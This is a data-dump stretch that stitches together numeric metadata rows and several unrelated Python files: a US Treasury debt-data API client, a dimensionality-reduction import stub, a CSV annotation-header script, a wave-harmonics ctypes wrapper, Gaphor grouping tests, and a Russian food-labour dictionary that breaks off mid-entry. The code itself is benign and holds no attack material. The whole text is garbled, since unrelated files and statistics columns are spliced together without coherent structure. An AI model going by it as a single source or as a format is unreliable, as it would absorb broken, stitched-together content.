| 0
| 0
| 0
| 0
| 0.731034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
dbe9cd3f5677fbf1b33918fc8a3f3f61bad2e68c
| 25,770
|
py
|
Python
|
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 4
|
2021-05-27T01:43:00.000Z
|
2021-11-02T12:16:50.000Z
|
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | null | null | null |
treasury/outstanding_debt.py
|
areed1192/us-federal-treasury-python-api
|
59969bfd865528072ffcedfd861aab2e0f9764ba
|
[
"MIT"
] | 1
|
2022-01-16T14:59:32.000Z
|
2022-01-16T14:59:32.000Z
|
from typing import Dict
from typing import List
from treasury.session import FederalTreasurySession
class OutstandingDebtInstruments():
    """
    ## Overview:
    ----
    The Federal Treasury provides a wide range of data on
    outstanding debt instruments. The `OutstandingDebtInstruments`
    object is used to query data on these instruments.

    Every query method accepts the same selection/pagination
    parameters:

    fields : List[str] (optional, Default=None)
        The field(s) to include in the response. If desired fields
        are not specified, all fields will be returned.
    sort : List[str] (optional, Default=None)
        Sort a field in ascending (least to greatest) or descending
        (greatest to least) order. When no sort parameter is
        specified, the default is to sort by the first column listed
        (most endpoints thus sort by date, ascending).
    filters : List[str] (optional, Default=None)
        View a subset of the data based on specific criteria, e.g. a
        date range or a value threshold. When no filters are
        provided, all data is returned.
    page_number : int (optional, Default=1)
        The index for pagination, starting at 1.
    page_size : int (optional, Default=100)
        The number of rows returned per request.
    """

    def __init__(self, session: "FederalTreasurySession") -> None:
        """Initializes the `OutstandingDebtInstruments` object.

        ### Parameters
        ----
        session : `FederalTreasurySession`
            An initialized session of the `FederalTreasurySession`.

        ### Usage
        ----
            >>> treasury_client = FederalTreasuryClient()
            >>> outstanding_debt_instruments_service = treasury_client.outstanding_debt_instruments()
        """
        # Keep a handle on the shared HTTP session.
        self.treasury_session: "FederalTreasurySession" = session

    def __repr__(self) -> str:
        """String representation of the `FederalTreasuryClient.OutstandingDebtInstruments` object."""
        return '<FederalTreasuryClient.OutstandingDebtInstruments (active=True, connected=True)>'

    def _query(
        self,
        endpoint: str,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Join list-style arguments and issue a GET request to `endpoint`.

        All public query methods funnel through this helper so the
        (previously copy-pasted) parameter handling lives in one place.
        """
        # The API expects comma-separated strings, not Python lists.
        if fields:
            fields = ','.join(fields)
        if filters:
            filters = ','.join(filters)
        if sort:
            sort = ','.join(sort)
        return self.treasury_session.make_request(
            method='get',
            endpoint=endpoint,
            params={
                'format': 'json',
                'page[number]': page_number,
                'page[size]': page_size,
                'fields': fields,
                'sort': sort,
                'filters': filters
            }
        )

    def rates_of_exchange(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries exchange rates of foreign currencies to the U.S.
        dollar for reporting.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.rates_of_exchange()
        """
        return self._query(
            '/v1/accounting/od/rates_of_exchange',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def mature_unredeemed_debt(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries the Mature Unredeemed Debt table: savings bonds that
        have met their maturity date and have not been requested by the
        customer to be redeemed.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.mature_unredeemed_debt()
        """
        return self._query(
            '/v1/accounting/od/savings_bonds_mud',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def piece_information_by_series(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries the Piece Information by Series table: total number of
        savings bonds by series issued, redeemed and outstanding as of
        the record_date.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.piece_information_by_series()
        """
        return self._query(
            '/v1/accounting/od/savings_bonds_pcs',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def saving_bonds_report(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries Paper Savings Bonds Issues, Redemptions, and
        Maturities by Series.

        For each series of Treasury savings bonds, this dataset details
        how many are issued, redeemed and outstanding. It does not
        contain values or yields. Data dates to the beginning of fiscal
        year 1999 and is updated monthly.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.saving_bonds_report()
        """
        return self._query(
            '/v1/accounting/od/savings_bonds_report',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def federal_debt_by_month(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries the Schedules of Federal Debt by Month.

        Monthly activity for the Federal Debt Managed by the Bureau of
        the Fiscal Service, separated by Held by the Public and
        Intragovernmental Debt Holdings, totaled by Principal, Accrued
        Interest Payable, and Net Unamortized Premiums/Discounts. All
        figures are rounded to the nearest million.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.federal_debt_by_month()
        """
        return self._query(
            '/v1/accounting/od/schedules_fed_debt',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def federal_debt_fiscal_ytd(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries the Schedules of Federal Debt, Fiscal Year-to-Date.

        Fiscal year-to-date activity for the Federal Debt Managed by
        the Bureau of the Fiscal Service, separated by Held by the
        Public and Intragovernmental Debt Holdings, totaled by
        Principal, Accrued Interest Payable, and Net Unamortized
        Premiums/Discounts. All figures are rounded to the nearest
        million.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.federal_debt_fiscal_ytd()
        """
        return self._query(
            '/v1/accounting/od/schedules_fed_debt_fytd',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def saving_bond_securities(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries Savings Bonds Securities: statistics on sold,
        redeemed, outstanding, and interest rates of non-marketable
        savings bonds.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.saving_bond_securities()
        """
        return self._query(
            '/v1/accounting/od/slgs_savings_bonds',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )

    def state_and_local_gov_securities(
        self,
        fields: List[str] = None,
        sort: List[str] = None,
        filters: List[str] = None,
        page_number: int = 1,
        page_size: int = 100
    ) -> Dict:
        """Queries State and Local Government Series Securities
        (Non-Marketable).

        Recap of State and Local Government Series (SLGS) transaction
        and balance activity, updated daily, including subscriptions,
        cancellations, issues, outstanding, and redemptions of
        non-marketable SLGS securities.

        Shared parameters are documented on the class docstring.

        ### Returns
        ----
        Dict
            A collection of `Records` resources.

        ### Usage
        ----
            >>> outstanding_debt_instruments_service.state_and_local_gov_securities()
        """
        return self._query(
            '/v1/accounting/od/slgs_securities',
            fields=fields, sort=sort, filters=filters,
            page_number=page_number, page_size=page_size
        )
| 36.605114
| 111
| 0.58312
| 2,917
| 25,770
| 5.075763
| 0.087076
| 0.022694
| 0.047413
| 0.035661
| 0.865865
| 0.859787
| 0.859787
| 0.859787
| 0.859787
| 0.854654
| 0
| 0.004981
| 0.345634
| 25,770
| 703
| 112
| 36.657184
| 0.873036
| 0.614241
| 0
| 0.817778
| 0
| 0
| 0.113099
| 0.047253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.013333
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0eb950996b8e6445e656f2185f0d886d27c5571c
| 218
|
py
|
Python
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 21
|
2021-11-23T13:01:36.000Z
|
2022-03-23T03:45:30.000Z
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 217
|
2021-11-23T00:11:01.000Z
|
2022-03-30T08:11:49.000Z
|
relevanceai/operations/dr/models/__init__.py
|
RelevanceAI/RelevanceAI
|
a0542f35153d9c842f3d2cd0955d6b07f6dfc07b
|
[
"Apache-2.0"
] | 4
|
2022-01-04T01:48:30.000Z
|
2022-02-11T03:19:32.000Z
|
from relevanceai.operations.dr.models.ivis import Ivis
from relevanceai.operations.dr.models.pca import PCA
from relevanceai.operations.dr.models.umap import UMAP
from relevanceai.operations.dr.models.tsne import TSNE
| 43.6
| 54
| 0.853211
| 32
| 218
| 5.8125
| 0.3125
| 0.322581
| 0.537634
| 0.580645
| 0.709677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073395
| 218
| 4
| 55
| 54.5
| 0.920792
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ed834a8c86eed138c82c12ba24e2b483a967369
| 5,783
|
py
|
Python
|
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
others/create_empty_annotations_file.py
|
cph-cachet/cachet-ecg-db
|
655795c23205b8b2563def45667e7daf2b56a570
|
[
"MIT"
] | null | null | null |
import csv
import shutil
import os
import pandas as pd
def rename_results_xlms_to_context(src):
    """Prepend a 'Start,End,Class' header row to every non-empty
    annotation.csv found under src/<subject>/<recording>/<record>/.

    Fixes relative to the original:
    - count_yes is now actually incremented (it was printed but never set).
    - directory lists are filtered up front instead of mutating the list
      that is being iterated.
    - a missing annotation.csv no longer raises FileNotFoundError
      (os.path.getsize on a non-existent path); it is counted as missing.

    Args:
        src: Root directory of the annotation tree.
    """
    subjects = [d for d in os.listdir(src) if d != '.DS_Store']
    count_no = 0
    count_yes = 0
    for subject in subjects:
        print("processing subject" + subject)
        subject_dir = os.path.join(src, subject)
        # Skip Finder metadata and the per-recording .json side files.
        recordings = [
            r for r in os.listdir(subject_dir)
            if r != '.DS_Store' and ".json" not in r
        ]
        for recording in recordings:
            print("processing recording " + recording + " of " + subject)
            recording_dir = os.path.join(subject_dir, recording)
            records = [p for p in os.listdir(recording_dir) if p != '.DS_Store']
            for record in records:
                ann = os.path.join(recording_dir, record, "annotation.csv")
                if os.path.exists(ann) and os.path.getsize(ann) != 0:
                    print("file exists ")
                    count_yes += 1
                    # Read the existing rows, then rewrite the file with
                    # the header row prepended.
                    with open(ann, newline='') as f:
                        data = list(csv.reader(f))
                    with open(ann, 'w', newline='') as f:
                        w = csv.writer(f)
                        w.writerow(['Start', 'End', 'Class'])
                        w.writerows(data)
                else:
                    print('File does not exists')
                    count_no += 1
    print("no " + str(count_no))
    print("Yes" + str(count_yes))
def create_empty_csv_file_if_no_annotaions_exists(src):
    """Count record directories that do / do not contain annotation.csv
    under src/<subject>/<recording>/<record>/ and print a summary.

    Despite its name, this function only counts and reports; the code
    that would create empty files was commented out in the original and
    is intentionally not resurrected here.

    Fixes relative to the original: directory lists are filtered up
    front instead of mutating the list that is being iterated, and dead
    commented-out code was removed.

    Args:
        src: Root directory of the annotation tree.
    """
    subjects = [d for d in os.listdir(src) if d != '.DS_Store']
    count_no = 0
    count_yes = 0
    for subject in subjects:
        print("processing subject" + subject)
        # Number of annotated records found for this subject.
        days = 0
        subject_dir = os.path.join(src, subject)
        recordings = [r for r in os.listdir(subject_dir) if r != '.DS_Store']
        for recording in recordings:
            print("processing recording " + recording + " of " + subject)
            recording_dir = os.path.join(subject_dir, recording)
            records = [p for p in os.listdir(recording_dir) if p != '.DS_Store']
            for record in records:
                ann = os.path.join(recording_dir, record, "annotation.csv")
                if os.path.exists(ann):
                    print("file exists ")
                    days += 1
                    count_yes += 1
                else:
                    count_no += 1
                    print('File does not exists')
        print(days)
    print("no " + str(count_no))
    print("Yes" + str(count_yes))
# Script entry point: rewrites annotation.csv headers under the dataset root.
# NOTE(review): the path below is machine-specific — adjust before running.
rename_results_xlms_to_context("/Users/deku/Desktop/CACHET-AFDB/FINAL/annotations")
#create_empty_csv_file_if_no_annotaions_exists( "/Users/deku/Desktop/CACHET-AFDB/FINAL/annotations")
| 35.919255
| 105
| 0.508905
| 552
| 5,783
| 5.184783
| 0.157609
| 0.044025
| 0.045423
| 0.090846
| 0.852551
| 0.826695
| 0.798043
| 0.768693
| 0.742138
| 0.708595
| 0
| 0.002999
| 0.365727
| 5,783
| 161
| 106
| 35.919255
| 0.777263
| 0.265433
| 0
| 0.746988
| 0
| 0
| 0.106237
| 0.01162
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024096
| false
| 0
| 0.048193
| 0
| 0.072289
| 0.289157
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0eeea505140d78c662e659ecfe3cfdf9ed0e6c3d
| 5,169
|
py
|
Python
|
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | 1
|
2022-03-11T13:47:00.000Z
|
2022-03-11T13:47:00.000Z
|
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | null | null | null |
MHDWaveHarmonics/FindHarmonics.py
|
mattkjames7/MHDWaveHarmonics
|
ac8fcc5bf9190d300774c4e114a6ec4be865f014
|
[
"MIT"
] | null | null | null |
import numpy as np
import ctypes
from numpy.ctypeslib import ndpointer
from . import Globals
def FindHarmonics(T,s,Params,halpha=None,RhoBG=None,Harmonics=(1,2,3),x0=None,df=1.0,Method='Complex'):
	'''
	Finds harmonic frequencies of waves capable of standing on a given
	field line.

	Args:
		T: TraceField object (must provide Bx, By, Bz, x, y, z and nstep;
			optionally InPlanet, Rmso or R).
		s: Array storing distance along the field line in km.
		Params: For power law: 2-element array/list [p_eq,power].
			For Sandhu model: 5-element array/list [n0,alpha,a,beta,mav0]
			(see GetSandhuParams).
		halpha: h_alpha array for the field line in order to use the
			Singer et al. wave equation, or None for the simple wave
			equation.
		RhoBG: Optional background density array, or None for zeros.
			(NOTE(review): presumably in the same units as the density
			model output — confirm against the C++ code.)
		Harmonics: A list or array of the harmonic numbers to be found.
		x0: Starting frequency; scalar, or one value per harmonic when
			Method='Complex'.
		df: Frequency step size in mHz (default=1.0); smaller values
			should be used when expecting very low frequencies.  Not
			used when Method='Complex', only for Method='Simple'.
		Method: 'Complex' or 'Simple' — which shooting method to use.

	Returns:
		ndarray containing the nh harmonic frequencies in mHz.
		Boolean array saying whether each fit was successful (only
			really applicable to the Complex method).
		Number of iterations used to calculate the harmonics.
	'''
	#field magnitude and radial distance along the trace, 32-bit floats
	#as expected by the C++ library
	_B = np.sqrt(T.Bx**2.0 + T.By**2.0 + T.Bz**2.0).astype('float32')
	_R = np.sqrt(T.x**2.0 + T.y**2.0 + T.z**2.0).astype('float32')
	_maxR = np.float32(np.nanmax(_R))
	_s = s.astype('float32')

	#optional h_alpha (Singer et al. equation); ones = simple wave equation
	if halpha is not None:
		_halpha = halpha.astype('float32')
	else:
		_halpha = np.ones(np.size(s),dtype='float32')

	#optional background density; zeros = none
	if RhoBG is not None:
		_RhoBG = RhoBG.astype('float32')
	else:
		_RhoBG = np.zeros(np.size(s),dtype='float32')

	_n = T.nstep
	_Params = np.float32(Params)
	_nP = np.int32(np.size(Params))

	#one output slot per requested harmonic
	_HarmInds = np.array(Harmonics,dtype='int32')
	_nh = np.int32(_HarmInds.size)
	_freqs = np.zeros(_nh,dtype='float32')

	#BUG FIX: Method was previously compared with "is", which only works
	#by accident of CPython string interning — use "==" for value equality.
	if x0 is None:
		if Method == 'Complex':
			x0 = np.float32(1.0)
		else:
			x0 = np.float32(0.0)

	if Method == 'Complex':
		#the complex method wants one starting frequency per harmonic
		if np.size(x0) == 1:
			_x0 = np.zeros(_nh,dtype='float32') + x0
		else:
			_x0 = np.array(x0,dtype='float32')
		_nIter = np.zeros(_nh,dtype='int32')
	else:
		_x0 = np.float32(x0)
		_nIter = np.zeros(1,dtype='int32')
	_df = np.float32(df)

	#'bool8' alias was removed in NumPy 2.0; 'bool' is the same dtype.
	#(The original redundant double .astype('bool8') is also dropped.)
	_Success = np.zeros(_nh,dtype='bool')

	#flag trace points inside the planet (R < 1.0 — presumably in units
	#of planetary radii, TODO confirm)
	if hasattr(T,'InPlanet'):
		_InPlanet = np.float32(T.InPlanet)
	elif hasattr(T,'Rmso'):
		_InPlanet = np.float32(T.Rmso < 1.0)
	else:
		_InPlanet = np.float32(T.R < 1.0)

	#call the appropriate C++ solver; fills _Success/_nIter/_freqs in place
	if Method == 'Complex':
		Globals._CppFindHarmonicsComplex(_B,_R,_s,_halpha,_InPlanet,_RhoBG,_n,_Params,_nP,_maxR,_HarmInds,_nh,_x0,_Success,_nIter,_freqs)
	else:
		Globals._CppFindHarmonics(_B,_R,_s,_halpha,_InPlanet,_RhoBG,_n,_Params,_nP,_maxR,_df,_HarmInds,_nh,_x0,_nIter,_freqs)

	return _freqs,_Success,_nIter
def FindHarmonicsPMD(B,pmd,s,halpha=None,RhoBG=None,Harmonics=(1,2,3),x0=None,df=1.0,Method='Complex'):
	'''
	Finds harmonic frequencies of waves capable of standing on a given
	field line, given field strength and density profiles directly
	(instead of a TraceField object).

	Args:
		B: Array of magnetic field magnitude along the field line.
		pmd: Array of density along the field line (NOTE(review):
			presumably plasma mass density — confirm units against the
			C++ code).
		s: Array storing distance along the field line in km.
		halpha: h_alpha array for the field line in order to use the
			Singer et al. wave equation, or None for the simple wave
			equation.
		RhoBG: Optional background density array, or None for zeros.
		Harmonics: A list or array of the harmonic numbers to be found.
		x0: Starting frequency; scalar, or one value per harmonic when
			Method='Complex'.
		df: Frequency step size in mHz (default=1.0); smaller values
			should be used when expecting very low frequencies.  Not
			used when Method='Complex', only for Method='Simple'.
		Method: 'Complex' or 'Simple' — which shooting method to use.

	Returns:
		ndarray containing the nh harmonic frequencies in mHz.
		Boolean array saying whether each fit was successful (only
			really applicable to the Complex method).
		Number of iterations used to calculate the harmonics.
	'''
	#32-bit copies of the input profiles, as expected by the C++ library
	_B = np.array(B).astype('float32')
	_pmd = np.array(pmd).astype('float32')
	_s = s.astype('float32')

	#optional h_alpha (Singer et al. equation); ones = simple wave equation
	if halpha is not None:
		_halpha = halpha.astype('float32')
	else:
		_halpha = np.ones(np.size(s),dtype='float32')

	#optional background density; zeros = none
	if RhoBG is not None:
		_RhoBG = RhoBG.astype('float32')
	else:
		_RhoBG = np.zeros(np.size(s),dtype='float32')

	_n = _B.size

	#one output slot per requested harmonic
	_HarmInds = np.array(Harmonics,dtype='int32')
	_nh = np.int32(_HarmInds.size)
	_freqs = np.zeros(_nh,dtype='float32')

	#BUG FIX: Method was previously compared with "is", which only works
	#by accident of CPython string interning — use "==" for value equality.
	if x0 is None:
		if Method == 'Complex':
			x0 = np.float32(1.0)
		else:
			x0 = np.float32(0.0)

	if Method == 'Complex':
		#the complex method wants one starting frequency per harmonic
		if np.size(x0) == 1:
			_x0 = np.zeros(_nh,dtype='float32') + x0
		else:
			_x0 = np.array(x0,dtype='float32')
		_nIter = np.zeros(_nh,dtype='int32')
	else:
		_x0 = np.float32(x0)
		_nIter = np.zeros(1,dtype='int32')
	_df = np.float32(df)

	#'bool8' alias was removed in NumPy 2.0; 'bool' is the same dtype.
	_Success = np.zeros(_nh,dtype='bool')

	#no trace object here, so assume no points lie inside the planet
	_InPlanet = np.zeros(_n,dtype='float32')

	#call the appropriate C++ solver; fills _Success/_nIter/_freqs in place
	if Method == 'Complex':
		Globals._CppFindHarmonicsPMDComplex(_B,_s,_halpha,_pmd,_InPlanet,_RhoBG,_n,_HarmInds,_nh,_x0,_Success,_nIter,_freqs)
	else:
		Globals._CppFindHarmonicsPMD(_B,_s,_halpha,_pmd,_InPlanet,_RhoBG,_n,_df,_HarmInds,_nh,_x0,_nIter,_freqs)

	return _freqs,_Success,_nIter
| 31.907407
| 131
| 0.708454
| 830
| 5,169
| 4.257831
| 0.184337
| 0.033107
| 0.020374
| 0.031692
| 0.850311
| 0.836446
| 0.836446
| 0.822298
| 0.79966
| 0.79966
| 0
| 0.038745
| 0.161153
| 5,169
| 161
| 132
| 32.10559
| 0.776292
| 0.435481
| 0
| 0.715909
| 0
| 0
| 0.085539
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0
| 0.045455
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16521c177783853b349cc8bcc9c4d5403eacfd75
| 2,428
|
py
|
Python
|
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
gaphor/UML/deployments/tests/test_grouping.py
|
MartinIIOT/gaphor
|
b08bf6ddb8c92ec87fccabc2ddee697609f73e67
|
[
"Apache-2.0"
] | null | null | null |
from gaphor import UML
from gaphor.diagram.group import group, ungroup
def test_node_group(element_factory):
    """A node can be composed inside another node via grouping."""
    parent = element_factory.create(UML.Node)
    child = element_factory.create(UML.Node)

    assert group(parent, child)

    assert child in parent.nestedNode
    assert parent not in child.nestedNode
def test_node_ungroup(element_factory):
    """Ungrouping removes a nested node from its parent node."""
    parent = element_factory.create(UML.Node)
    child = element_factory.create(UML.Node)
    assert group(parent, child)

    assert ungroup(parent, child)

    assert child not in parent.nestedNode
    assert parent not in child.nestedNode
def test_node_ungroup_wrong_parent(element_factory):
    """Ungrouping from a node that is not the parent is refused."""
    parent = element_factory.create(UML.Node)
    child = element_factory.create(UML.Node)
    unrelated = element_factory.create(UML.Node)
    assert group(parent, child)

    assert not ungroup(unrelated, child)

    # The original composition is untouched.
    assert child in parent.nestedNode
    assert parent not in child.nestedNode
def test_artifact_group(element_factory):
    """Grouping an artifact under a node creates a single deployment."""
    node = element_factory.create(UML.Node)
    artifact = element_factory.create(UML.Artifact)

    assert group(node, artifact)

    assert node.deployment
    assert node.deployment[0].deployedArtifact[0] is artifact
    assert len(element_factory.lselect(UML.Deployment)) == 1
def test_artifact_group_is_idempotent(element_factory):
    """Grouping the same artifact repeatedly reuses one deployment."""
    node = element_factory.create(UML.Node)
    artifact = element_factory.create(UML.Artifact)

    for _ in range(3):
        assert group(node, artifact)

    assert node.deployment
    assert node.deployment[0].deployedArtifact[0] is artifact
    assert len(element_factory.lselect(UML.Deployment)) == 1
def test_artifact_ungroup(element_factory):
    """Ungrouping an artifact removes the node's deployment entirely."""
    node = element_factory.create(UML.Node)
    artifact = element_factory.create(UML.Artifact)
    assert group(node, artifact)

    assert ungroup(node, artifact)

    assert not node.deployment
    assert not element_factory.lselect(UML.Deployment)
def test_artifact_ungroup_wrong_parent(element_factory):
    """Ungrouping from a node that does not deploy the artifact is refused."""
    node = element_factory.create(UML.Node)
    artifact = element_factory.create(UML.Artifact)
    unrelated = element_factory.create(UML.Node)
    assert group(node, artifact)

    assert not ungroup(unrelated, artifact)

    # The original deployment is untouched.
    assert node.deployment
    assert element_factory.lselect(UML.Deployment)
| 26.977778
| 60
| 0.718287
| 341
| 2,428
| 4.97654
| 0.11437
| 0.222746
| 0.188568
| 0.216853
| 0.842664
| 0.783736
| 0.766647
| 0.766647
| 0.738362
| 0.734237
| 0
| 0.01665
| 0.18369
| 2,428
| 89
| 61
| 27.280899
| 0.839556
| 0.113674
| 0
| 0.685185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.537037
| 1
| 0.12963
| false
| 0
| 0.037037
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
167fe20106988ac8489c218e03601c32dbfe281d
| 27,447
|
py
|
Python
|
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | null | null | null |
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | 3
|
2018-06-25T21:10:44.000Z
|
2019-07-03T13:51:09.000Z
|
scripts/dict/amber_model_workers_food.py
|
Shadybloom/amber-in-the-dark
|
688a6c6fe1a251860174d14a0ca76b5b1c5a5527
|
[
"WTFPL"
] | 2
|
2018-06-24T23:00:17.000Z
|
2019-06-29T10:42:16.000Z
|
#----
# Заметки:
# Группировка по кулинарным приёмам.
# Сортировка, чистка, жарение, варка и так далее.
#----
# Потребление пищи и питья
metadict_model['_-Потребление антреме (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление второго блюда (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление выпечки (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление десерта (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление жареной выпечки (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление орешков (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление первого блюда (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление сладостей (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление вареников (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление соуса (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление сэндвичей (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление фруктов (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление хлеба (нормо-часов)'] = {
'_--Потребление пищи (нормо-часов)':1,
}
metadict_model['_-Потребление холодного питья (нормо-часов)'] = {
'_--Потребление питья (нормо-часов)':1,
}
metadict_model['_-Потребление горячего питья (нормо-часов)'] = {
'_--Потребление питья (нормо-часов)':1,
}
#----
# Процессы (кипячение):
metadict_model['_-Кипячение консервов (нормо-часов)'] = {
